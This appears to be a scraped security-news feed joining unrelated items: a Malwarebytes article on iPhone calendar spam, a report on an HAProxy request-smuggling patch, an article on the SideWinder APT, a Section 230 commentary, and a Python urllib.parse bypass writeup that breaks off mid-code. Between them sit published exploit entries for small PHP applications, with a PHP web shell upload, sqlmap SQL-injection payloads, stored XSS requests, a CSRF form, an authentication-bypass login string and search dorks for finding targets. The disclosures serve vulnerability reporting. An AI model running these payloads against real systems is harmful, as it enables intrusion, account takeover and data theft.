Categories: Awareness
Categories: News
Categories: Scams
Tags: iPhone

Tags:  calendar

Tags:  spam

Tags:  iOS

Tags:  mobile

Tags:  device

Tags:  ad

Tags:  advert

Tags:  popup

Tags:  permission

Tags:  remove

Tags:  notification

Tags:  Apple

Is your iPhone claiming that you’ve been hacked, your phone isn't protected, or that viruses have damaged it? It could be calendar spam.



(Read more...)




The post iPhone calendar spam: What it is, and how to remove it appeared first on Malwarebytes Labs.

If you open up your iPhone and see a variety of messages claiming that you’ve been hacked, your phone is not protected, that viruses have damaged your phone, or, my personal favourite, “Click to get rid of annoying ads”, fear not. It’s quite possible you’ve accidentally wandered into a common form of scam: Calendar spam.

Calendar spam is a way for scammers to insert nonsensical claims, offers, and warnings with potentially harmful links into your calendar, which triggers notifications on your device.

**How you get it**

The most common techniques for spreading calendar spam are bogus adverts, popups, and other forms of coding used on websites which may be of a questionable nature. They can be found on pornography sites, but also file sharing sites, unofficial streaming platforms, gaming sites, random blogs, pretty much anywhere at all.

Calendar applications like iCal make it easy to add public calendars, which are just URLs, and the scammers exploit that ease of use. The aim of the scammers' game is to get unsuspecting users to accept a calendar subscription. Often, they will obscure the subscription with a distraction. For example, a user may be asked to confirm that they’re a human via CAPTCHA. The user clicks through, and before they realise it, they’ve also clicked “OK” to a follow-up message containing a calendar subscription.

Should you accept one of these subscriptions, the spam calendar and all related events will be added to your calendar app. The events in the calendar contain alerts, which generate notifications, which could leave your screen looking a little something like this. Should you venture into your calendar, a tangled mess of calendar entries awaits.

The links in the calendar entries lead to the usual range of spam, surveys, bogus apps, fake security tools, and more besides. They have nothing you want or need to be wasting your time on. With this in mind, what can you do about it?

**How to remove it**

This is such a problem point for Apple that a dedicated page exists for just this problem. There are two ways to remove calendar spam, and it’s dependent on which iOS version you use. From the help pages:

****iOS 14.6 or later****

*   Open the Calendars app.
*   Tap the unwanted Calendar event.
*   Tap Unsubscribe from this Calendar at the bottom of the screen.
*   To confirm, tap Unsubscribe.

****Earlier versions of iOS****

*   Open the Calendar app.
*   At the bottom of the screen, tap Calendars.
*   Look for a calendar that you don't recognize. Tap the More Info button next to that calendar, then scroll down and tap Delete Calendar.

If this doesn't fix the issue, delete the calendar subscription in Settings:

*   Open the Settings app.
*   Tap Calendar **>** Accounts. Or if you use iOS 13, tap Passwords & Accounts > Accounts instead.
*   Tap Subscribed Calendars.
*   Look for a calendar that you don't recognize. Tap it, then tap Delete Account.

**Not just iPhone**

Spammers will try and abuse all sorts of devices, apps, and systems in order to besiege you with calendar spam (or even calendar-style spam) notification alerts. In 2019, Google Calendar users were hit with a wave of spam notifications, and Calendly users were impacted by phishers abusing the service in 2022. In that same year, new safety features appeared for Google Docs users in order to give users a little more confidence that notifications were not bogus.

No matter the device or service, anything with notification ability could be a target. In many ways, phone calendar spam is a perfect fit for phones where everyday misclicks are very common. It only takes one spam calendar prompt hidden behind something else and a split second lapse in attention for the scammers to stake a claim on your phone.

The good news is that once you understand how the scam works, it’s very easy to remove the notifications and keep your phone free from endless spam notifications.

**Keeping your calendars spam free**

*   **Be careful where you click**. Scammers have to fool you into subscribing to a calendar for this to work, so read before you click! If you do add a calendar prompt, don’t panic. Follow the removal instructions above.
*   **Use Malwarebytes for iOS**. It can block rogue websites and adverts, the two primary causes of unwanted calendar prompts.

Stay safe out there!

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

iPhone calendar spam: What it is, and how to remove it

Exploitation could enable attackers to access backend servers

Exploitation could enable attackers to access backend servers

HAProxy, the popular open source load balancer and reverse proxy, has patched a bug that could enable attackers to stage HTTP request smuggling attacks.

By sending a maliciously crafted HTTP request, an attacker could bypass the filters of HAProxy and gain unauthorized access to back-end servers.

**Dropped headers**

According to a notice by Willy Tarreau, the maintainer of HAProxy, “a properly crafted HTTP request can make HAProxy drop some important headers fields such as Connection, Content-length, Transfer-Encoding, Host, etc after having parsed and at least partially processed them”.

This can confuse HAProxy and force it to send requests to the back-end server without applying filters.

For example, it can be used to bypass HAProxy’s authentication checks for certain URLs or give attackers access to restricted resources. The vulnerability is not hard to exploit, but its impact depends on the target web server and how much it relies on HAProxy filters to secure its resources.

“It just requires moderate knowledge of the HTTP protocol and how a smuggling attack works,” Tarreau told The Daily Swig.

“I know that usual HTTP vuln seekers will immediately understand how to exploit this and will just need two-to-three tests to confirm their hypothesis, which is why it was really not needed to \[include\] more details.”

**Bug present since 2019**

The vulnerability was reported by a group of researchers at Northeastern University, Akamai Technologies, and Google who were running tests.

Tarreau said the vulnerability had existed since version 2.0 of HAProxy, which was released in June 2019.

“Any config supporting HTTP/1 on the client and HTTP/1 on the server is vulnerable unless it runs on the fixed version or it contains the workaround I proposed,” Tarreau said. “So that’s rather close to 100% of exposed deployments.”

Want the latest web security news sent straight to your inbox? Sign up to our newsletter here

Instances deployed deeper in the infrastructure, such as API gateways, are not at risk since no application nor front proxy will produce such invalid requests.

Tarreau is actively maintaining seven versions of HAProxy and has issued fixes for all of them.

“A load balancer is a critical component in an infrastructure, and generally users do not want to upgrade it unless absolutely necessary or if they need new features,” Tarreau said.

“Thus we maintain each stable version for five years so that they have plenty of time to validate a new one and upgrade when needed.”

**Workaround**

For those who are not able to immediately upgrade to the latest version, Tarreau has provided a temporary config-based workaround that blocks attacks by detecting the internal conditions caused by the exploitation of the bug.

And for those who are running older versions of HAProxy, Tarreau’s notice warns: “If you’re running on an outdated version… the best short-term option will be to upgrade to the immediately next branch, which is the one that will give you the least surprise or changes.

“Please do not ask for help upgrading from outdated versions, if you didn’t care about updating in five years, it’s unlikely that anyone will care about helping you to catch up.”

The vulnerability is not the first serious HTTP request smuggling flaw to affect HAProxy, with The Daily Swig reporting on a similar issue afflicting the platform that was disclosed by JFrog researchers in September 2021.

YOU MAY ALSO LIKE OAuth ‘masterclass’ crowned top web hacking technique of 2022

HTTP request smuggling bug patched in HAProxy

Best POS Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Authenticated Remote Code Execution on File Upload# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA### Steps to Reproduce1- Login as Admin Rule2- Head to " http://localhost/kruxton/index.php?page=site_settings"3- Try to Upload an image here it will be a shell.php```shell.php``````<?php system($_GET['cmd']); ?>4- Head to http://localhost/kruxton/assets/uploads/5- Access your uploaded Shellhttp://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami

Best POS Management System 1.0 Shell Upload

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------7128987773293048653857517  
Content-Length: 442  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-category  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>  
-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="description"

This is POC  
-----------------------------7128987773293048653857517--  
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------11015616619250686693182759357  
Content-Length: 830  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-product  
Cookie: PHPSESSID=<COOKIE>  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="category_id"

3'  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="price"

1122  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="status"

1  
-----------------------------11015616619250686693182759357--

```

Best POS Management System 1.0 Cross Site Scripting

By Habiba Rashid
The suspected Indian state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region.
This is a post from HackRead.com Read the original post: SideWinder Behind Govt Phishing Spree Across the East

SideWinder is apparently an India-based advanced persistent threat (APT) group known for spreading malware, infiltrating networks, and stealing sensitive information.

Security researchers at Group-IB have finally been successful in connecting a series of phishing campaigns between June and November 2021 to an Indian Advanced Persistent Threat (APT) group, SideWinder.

The suspected state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region, according to a report from Group-IB.

Also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, the group is considered one of the oldest national-state groups, going as far back as 2012. **In January 2020**, the group was found to be infecting Android devices with malware through the Play Store.

In another attack **reported in February 2022**, SideWinder was observed collaborating with another group called ModifiedElephant and targeting unsuspecting users by planting incriminating evidence on their devices.

In June of last year, the group’s custom tool, SideWinder.AntiBot.Script, was used in previously undocumented phishing attacks against Pakistani organizations. The group was also linked to an attack on the Maldivian government in 2020.

Like many others, SideWinder also uses **spear phishing** as its initial attack vector, sending phishing emails containing malicious attachments or URLs to victims. Two of these campaigns featured emails in which the group impersonated a cryptocurrency firm, said Group-IB.

If a user clicks on the link attachment, a malicious document, an LNK file, or a payload is subsequently downloaded onto their computer. The LNK file downloads an HTA file, which then downloads the payload. This payload could be either a remote access Trojan (RAT) or an information stealer, according to Group-IB’s technical analysis.

Further, two new custom-made SideWinder tools discovered by Group-IB during the campaign were SideWinder.RAT.b, a RAT, and SideWinder.StealerPy, an info-stealer.

The info-stealer is capable of collecting **Google Chrome browsing history**, credentials saved in the browser, the list of folders in the directory, meta-information, the contents of docx, pdf, and txt files and more.

The APT group’s motive seems to be linked to India’s cryptocurrency market, Group-IB’s **report** speculates.

> “Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.”

However, Group-IB cannot confirm how many, if any, of these phishing campaigns were successful. Nevertheless, users and organizations must take precautions against SideWinder’s attack, starting with the following steps:

**Keep your software up to date:** Make sure your operating system and all your software are up to date with the latest security patches. This will help protect you against known vulnerabilities that could be exploited by SideWinder.

**Use strong passwords:** Use complex and unique passwords for all your accounts and enable two-factor authentication whenever possible. This can help prevent unauthorized access to your accounts and make it more difficult for SideWinder to gain access.

**Be cautious of phishing emails:** SideWinder often uses phishing emails to trick users into clicking on a malicious link or downloading a malicious attachment. Be cautious of emails from unknown senders, and do not click on links or download attachments unless you are sure they are safe.

**Use anti-malware software:** Install and use anti-malware software to help detect and prevent SideWinder attacks. Make sure your **anti-malware software** is up to date and set to automatically scan your system on a regular basis.

**Limit access to sensitive information:** Limit the number of people who have access to sensitive information, and use encryption to protect data that is transmitted or stored.

**Train employees:** **Train employees** on how to recognize and avoid SideWinder attacks. Educate them on safe browsing habits, how to identify phishing emails, and the importance of keeping software up to date.

1.  **Nation-State Hackers Targeted Facebook – Meta**
2.  **Novel Confucius Android spyware hits Pakistan military**
3.  **Indian PM Modi’s Twitter Account HACKED for Bitcoin scam**
4.  **Google closes sites with ties to hack-for-hire groups in India**
5.  **Indian APT infects its own devices, exposes Modus Operandi**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

SideWinder Behind Govt Phishing Spree Across the East

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Argon Dashboard 1.1.2 SQL Injection

Categories: News
Tags: section 230

Tags:  Gonzalez v. Google

Tags:  Twitter v. Taamneh

Tags:  liability

Tags:  publisher

Tags:  distributor

Tags:  ChatGPT

The Supreme Court's reconsideration of Section 230, a law that’s been the foundation for the way in which we have used the Internet for decades, could trigger major changes.



(Read more...)




The post Two Supreme Court cases could change the Internet as we know it appeared first on Malwarebytes Labs.

The Supreme Court is about to reconsider Section 230, a law that’s been the foundation of the way we have used the Internet for decades.

The court will be handling a few cases that at first glance are about online platforms' liability for hosting accounts from foreign terrorists. But at a deeper level these cases could determine whether or not algorithmic recommendations should receive the full legal protections of Section 230.

The implications of removing that protection could be huge. Section 230 has frequently been referred to as a key law, which has allowed the Internet to develop to what it is now. Whether we like it or not.

The are two cases waiting to be heard by the Supreme Court are Gonzalez v. Google and Twitter v. Taamneh. Both seek to draw big tech into the war on terror. The plaintiffs in both suits rely on a federal law that allows any USA national who is injured by an act of international terrorism to sue anyone who knowingly provided substantial assistance to whoever carried it out. The reasoning is that the platforms, Google and Twitter, provided assistance to terrorists by giving them the ability to recruit new members.

Section 230 is the provision that has, until now, protected those platforms from the negative consequences of user-generated content.

**Section 230**

Section 230 is a section of Title 47 of the United States Code that was enacted as part of the Communications Decency Act (CDA) of 1996, which is Title V of the Telecommunications Act of 1996, and generally provides immunity to websites from the negative effects of third-party content.

What's in question is whether providers should be treated as publishers or, alternatively, as distributors of content created by its users.

Before the Internet, a liability line was drawn between publishers of content and distributors of content. A publisher would be expected to have awareness of the material they published and could be held liable for it, while a distributor would likely not be aware and as such would be immune.

> No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.

Section 230 protections have never been limitless though, and require providers to remove material illegal on a federal level, such as in copyright infringement cases.

It all became a bit more complicated when online platforms—and social media in particular—started using algorithms that are designed to keep us occupied. These algorithms make sure that we are presented with content we have shown an interest in. The goal is to make us spend as much time on that platform as possible while the platform earns advertising dollars. While the content was not created by the platform, the algorith definitely does the bidding of the platform.

In the early days (cases that played out before the turn of the century) moderation was seen as an editorial action which shifted a platform from a distributor role into a publisher role, which didn’t exactly help to get some form of moderation started.

In modern times, now that moderation has become the norm on social platforms, the scale of content moderation decisions that need to be taken is immense. Reportedly, within a 30-minute timeframe, Facebook takes down over 615,000 pieces of content, YouTube removes more than 271,000 videos, channels and comments, and TikTok takes down nearly 19,000 videos.

**Possible implications**

Section 230, from an Internet perspective is an ancient law, written at a time when the Internet looked very different than it does today. Which brings us back to the algorithms that have people scrolling social media all day. One of the consequences of these algorithms noticing a preference for a particular subject is that they will serve you increasingly extreme content in that category.

Making platforms liable for the content provided by their users is likely to make everything a lot slower. Imagine what will happen if every frame of every video has to be analyzed and approved before it gets posted. We would soon see rogue social media platforms where you can’t sue anyone because the operators are hiding behind avatars on the Dark Web or in countries beyond the reach of US extradition treaties.

It could even have a chilling effect on freedom of speech, as social media platforms seek to avoid the risk of getting sued over the back and forth in a heated argument.

And what about the recent popularity surge we have seen in chatbots? Who will be seen as the publisher when ChatGPT and Bing Chat (or DAN and Sydney as their friends like to call them) uses online content to formulate a new answer without pointing out where they found the original content?

Let’s not forget sites that have an immense userbase, like Reddit, which largely depend on human volunteer moderators and a bit of automation to keep things civilized. Will those volunteers stick around when they can be blamed for million dollar lawsuits against the site?

Even easily overlooked services like Spotify could be facing lawsuits if their algorithm suggested a podcast that contains content considered harmful or controversial.

**The Halting Problem**

Stopping bad things from happening on platforms like Google and Twitter is an admirable ambition, but it is probably impossbile. Even if they were able to fully automate moderation, they would quickly run into the halting problem associated with decision problems.

A decision problem is a computational problem that can be posed as a yes–no question of the input values. So, is this content allowed or not? That sounds like a simple question, but is it? Turing proved no algorithm exists that always correctly decides whether, for a given arbitrary program and input, the program halts when run with that input. This is called the halting problem.

A direct derivative of the halting problem is that no algorithm will _always_ make the correct decision in a decision problem as complicated as content moderation.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Two Supreme Court cases could change the Internet as we know it

An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.

**Timelines**

07/20/2022: Issue first discoverd

08/03/2022: Report sent to security@python.org

08/25/2022: One staff wrote: “I personally agree this should probably be improved, we’ll see if I can convince the others. They’ll likely say we need to work through it publicly”

09/30/2022: Report accepted by CERT. (VU#127587)

11/12/2022: Issue is accidently fixed https://github.com/python/cpython/issues/99418. But the exploit is still private.

01/20/2023: Article published and apply for a CVE number.

**Summary**

urllib.parse is a very basic and widely used basic URL parsing function in various applications. One of Python’s core functions, urlparse, has a parsing problem when the entire URL starts with blank characters. This problem affects both the parsing of hostname and scheme, and eventually causes any blocklisting methods to fail.

This vulnerability is applicable to all python version before 3.11.

**Affected Module:**

urllib (https://github.com/python/cpython/tree/3.11/Lib/urllib)

**Relevant Package Manager/Ecosystem**

https://docs.python.org/3/library/urllib.html

**Root Cause of the Problems**

File Name: \\Python\\Python39\\Lib\\urllib\\parse.py

def urlparse(url, scheme='', allow\_fragments=True):
    """Parse a URL into 6 components:
    <scheme>://<netloc>/<path>;<params>?<query>#<fragment>

    The result is a named 6-tuple with fields corresponding to the
    above. It is either a ParseResult or ParseResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow\_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """
    url, scheme, \_coerce\_result = \_coerce\_args(url, scheme)
    splitresult = urlsplit(url, scheme, allow\_fragments)
    scheme, netloc, url, query, fragment = splitresult
    if scheme in uses\_params and ';' in url:
        url, params = \_splitparams(url)
    else:
        params = ''
    result = ParseResult(scheme, netloc, url, params, query, fragment)
    return \_coerce\_result(result)

The urlparse() function itself is more like a wrapper function. The mean function to process the URL is urlsplit() inside the same file.

def urlsplit(url, scheme=”, allow\_fragments=True):  
“””Parse a URL into 5 components:  
:///?#

def urlsplit(url, scheme='', allow\_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>

    The result is a named 5-tuple with fields corresponding to the
    above. It is either a SplitResult or SplitResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow\_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """

    url, scheme, \_coerce\_result = \_coerce\_args(url, scheme)

    for b in \_UNSAFE\_URL\_BYTES\_TO\_REMOVE:
        url = url.replace(b, "")
        scheme = scheme.replace(b, "")

    allow\_fragments = bool(allow\_fragments)
    key = url, scheme, allow\_fragments, type(url), type(scheme)
    cached = \_parse\_cache.get(key, None)
    if cached:
        return \_coerce\_result(cached)
    if len(\_parse\_cache) >= MAX\_CACHE\_SIZE: # avoid runaway growth
        clear\_cache()
    netloc = query = fragment = ''
    i = url.find(':')
    if i > 0:
        for c in url\[:i\]:
            if c not in scheme\_chars:
